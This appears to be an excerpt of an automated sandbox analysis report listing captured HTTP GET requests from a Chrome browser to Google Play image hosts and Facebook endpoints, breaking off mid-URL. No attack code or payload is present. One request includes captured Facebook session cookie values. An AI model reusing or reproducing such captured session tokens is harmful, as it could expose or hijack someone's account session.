    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i_Ou4/yX/l/en_GB/UlpshyJeqkw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /Gn-j-s2UVmDu0R26ZITvvCfxG4loVrSMUBCfQc4gSjVst_0ui8nEL14azh2ipu4DoeU=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vp/mp4/1280x720/KHfEG-2pIEI.mp4 HTTP/1.1Host: play-games.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://play.google.com/Accept-Language: en-US,en;q=0.9Range: bytes=32768-524287If-Range: Wed, 25 Sep 2024 20:08:08 GMT
    Source: global trafficHTTP traffic detected: GET /EL5-xK3KLbjgT36SiHKjECG7SL7RlMomiHO2ykqxhzclTTyKHIXMA0-PnshzElEHUpA=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /V3ZhQ8_Y0fpxU6raIoXNAtx_AE_IO71HDHgzJjN0vKZtKYwv41nr7WkNbILhGu5OHI5b=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /xZ9aAAGs60bJitt4kftzG2JSgo6rpZoII33fpvOxT17217hebF4c57DA_NNns7pktTw=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /DZtnSdEJ1VyGYxzK18Ky0dsC3ILexQDDsC-V1r4AQxrv3dNEiLgbCQQTdK9XQ69HF7RS=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jUORXw6jLupJakZVf6ZSV4SB2SWeiSKYYtqQHC5AUpNlFkqQv1yIwT2KIFEyY8QnwA8=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/221433308641448?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /j30yV01OUMEhaI4qDdl3LDL3aXKq3aNm_4mImGzNxTkPAVCa6D9cKvkMTh0UwEnJvj4=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /xlL2RGPKorMz9nqE1bio8ceqIRMlv9_X77ULaavTlx5NOU71SmqZTD6BYf4DYCxVBs8=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /V9eV8_8k5ssFM3cD8eA0oIYP-1mOekwcCFsH5cEWoOLvJ8EmUJYFRkdwg1d-lc1s9Q=w2560-h1440-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ohRyQRA9rNfhp7xLW0MtW1soD8SEX45Oec7MyH3FaxtukWUG_6GKVpvh3JiugzryLi7Bia02HPw=s20-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /W5DPtvB8Fhmkn5LbFZki_OHL3ZI1Rdc-AFul19UK4f7np2NMjLE5QquD6H0HAeEJ977u3WH4yaQ=s20-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /a/ACg8ocKuSzmnDV00ix3atEWYmyGKFuKJcfnKhu7p7TvSSbZ4nTjDyA=s32-rw-mo HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /a/ACg8ocJvrYwDJyRckGbLvJ-eKJjIJ6qfcK3108LZUcPbTK_gPp_h_Q=s32-rw-mo HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/1668333663438923?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /a/ACg8ocJZ_a0qI7f5pr9REiRB_V4G5VIHM_m0KU83eeL3o5d-9yiNCA=s32-rw-mo HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /GOsdMmikeSBOblYF_chfJHF_4N2xhGhZ3AtVC70mzi_BdM6cJs_T0SbyRSHJZX6xt0In=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /Gn-j-s2UVmDu0R26ZITvvCfxG4loVrSMUBCfQc4gSjVst_0ui8nEL14azh2ipu4DoeU=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /EL5-xK3KLbjgT36SiHKjECG7SL7RlMomiHO2ykqxhzclTTyKHIXMA0-PnshzElEHUpA=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/1362649510502605?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /V3ZhQ8_Y0fpxU6raIoXNAtx_AE_IO71HDHgzJjN0vKZtKYwv41nr7WkNbILhGu5OHI5b=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/bz?__a=1&__aaid=0&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU6C7UW3q327E2vwXw4BwUx60Vo1upE4W0OE2WxO0FE662y1Qw5Mx61vw4Ugao6C0lW0ny0RE2Jw8Xwn83fw6iw4vwbS1Lw7Jw7zwtU5K&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923872902985526&__req=1&__rev=1016900551&__s=s304av%3A16ovnc%3Ahld28a&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585651&__user=0&dpr=1&jazoest=2909&lsd=AVrc04HtBzE HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /jUORXw6jLupJakZVf6ZSV4SB2SWeiSKYYtqQHC5AUpNlFkqQv1yIwT2KIFEyY8QnwA8=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/221433308641448?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%